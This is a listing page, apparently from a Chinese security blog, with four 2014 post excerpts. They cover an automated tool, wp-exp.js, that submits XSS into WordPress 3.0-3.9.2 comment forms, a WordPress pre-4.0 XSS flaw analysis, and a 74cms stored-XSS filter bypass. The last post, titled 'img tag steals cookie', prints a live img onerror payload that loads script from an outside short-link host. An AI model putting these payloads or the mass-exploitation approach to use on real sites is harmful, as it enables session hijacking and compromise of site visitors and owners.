WordPress 3.0-3.9.2 XSS漏洞(全自动化利用工具)

admin 发布于 2014-12-04 10:34
wp-exp.js功能: 读取txt中每一行的内容去请求,从返回中解析文章的url,如果不是默认的那么便从rss中读取。 读取出文章url后,自动获得表单,并提交xss代码。 xss代码能覆盖掉页面百分之80的内容,触发面积更大: 程序运行后: 触发XSS后: ...

WordPress 4.0以下版本存在跨站脚本漏洞

admin 发布于 2014-11-27 12:43
漏洞分析 问题出在wordpress的留言处,通常情况下留言是允许一些html标签的,比 如<a>、<B>、<code>等等,然而标签中有一些属性是在白名单里的,比如<a>标签允许 href属性,但是onmouseover属性是不允许的。 但是在一个字符串格式化函数wptext...
标签: wordpress xss

骑士CMS全局XSS过滤绕过存储型XSS-指哪打哪

admin 发布于 2014-11-14 12:06
74cms_v3.5.1_20141020 骑士CMS全局XSS过滤绕过存储型XSS前台后台指哪打哪(大部分能输入的地方都可以)。 详细说明: 开篇:php里面的strip_tags()函数剥去 HTML、XML 以及 PHP 的标签。但是并不是所有的<XXX>都会被过滤。例如: <%0Ba...

img 标签窃取cookie

admin 发布于 2014-10-03 03:20
<img src=x onerror=document.body.appendChild(createElement('script')).src='http://126.am/ia8Vp4'> onerror="with(document)body.appendChild(createElement('script'))....
    1 2